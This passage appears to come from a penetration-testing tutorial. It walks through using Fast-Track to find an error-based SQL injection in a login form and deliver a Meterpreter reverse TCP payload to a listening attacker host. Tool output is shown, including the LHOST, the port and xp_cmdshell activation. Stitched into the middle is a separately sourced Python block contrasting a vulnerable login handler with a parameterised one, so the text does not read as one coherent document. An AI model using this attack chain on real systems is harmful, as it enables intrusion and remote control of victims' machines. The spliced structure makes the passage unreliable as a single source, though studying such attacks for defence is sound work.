Fast-Track

Spidering is complete.

*************************************************************************
http://10.211.55.128
*************************************************************************

[+] Number of forms detected: 2 [+]

A SQL Exception has been encountered in the "txtLogin" input field of the above website.

Depending on whether the website presents an error when SQL injection attempts are made, you will need to choose between BLIND and ERROR BASED attacks. We choose ERROR BASED because the site is kind enough to report back error messages when it has trouble executing a SQL query.
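What makes a form like "txtLogin" report a SQL exception, and what the corrected handler looks like, as an added example that is not from the original text or from Fast-Track. It assumes Python's sqlite3 as a stand-in for the site's database; the table, the function names and the sample input are hypothetical, and password verification is left out to keep the focus on the query.

```python
import sqlite3

def make_db():
    # Constructed in-memory table standing in for the site's user store.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (login TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 'constructed-hash')")
    return db

def login_vulnerable(db, txt_login):
    # 'Before' form: the field is concatenated into the statement and the
    # driver's exception text is echoed to the client. A legitimate surname
    # containing an apostrophe is enough to surface a SQL exception.
    sql = "SELECT login FROM users WHERE login = '" + txt_login + "'"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return 500, f"SQL Exception: {exc}"
    return (200, "welcome") if row else (401, "invalid login")

def login_hardened(db, txt_login, server_log):
    # 'After' form: the field is a bound parameter, so it is only ever data.
    # Any database failure is logged server-side and the client receives a
    # generic message that carries no query detail.
    try:
        row = db.execute(
            "SELECT login FROM users WHERE login = ?", (txt_login,)
        ).fetchone()
    except sqlite3.Error as exc:
        server_log.append(repr(exc))
        return 500, "request failed"
    return (200, "welcome") if row else (401, "invalid login")

if __name__ == "__main__":
    db, log = make_db(), []
    for value in ("alice", "o'brien"):  # constructed sample inputs
        print(value, login_vulnerable(db, value), login_hardened(db, value, log))
```

The bound parameter removes the injection point itself, and the generic error response removes the database detail that the handler would otherwise return to the client.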

Next, choose either to spider a single URL or to scan a complete subnet. After scanning the subnet, we choose to attack all the sites Fast-Track found. As you can see, scanning all the sites found a vulnerable form on one site.

The final configuration steps require that you select a payload. In the following example, you select Metasploit Meterpreter Reflective Reverse TCP along with the port that you want your attacking machine to listen on. After Fast-Track has successfully exploited the SQL injection vulnerability, it sends a chunked payload to the target and eventually presents you with your Meterpreter shell.

What type of payload do you want?

1. Custom Packed Fast-Track Reverse Payload (AV Safe)
2. Metasploit Reverse VNC Inject (Requires Metasploit)
3. Metasploit Meterpreter Payload (Requires Metasploit)
4. Metasploit TCP Bind Shell (Requires Metasploit)
5. Metasploit Meterpreter Reflective Reverse TCP
6. Metasploit Reflective Reverse VNC

Select your choice: 5

Enter the port you want to listen on: 9090

[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+]
[+] Delivery Complete. [+]
Created by msfpayload (http://www.metasploit.com).
Payload: windows/patchupmeterpreter/reverse_tcp
Length: 310
Options: LHOST=10.211.55.130,LPORT=9090
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Taking raw binary and converting to hex.
Raw binary converted to straight hex.

[+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]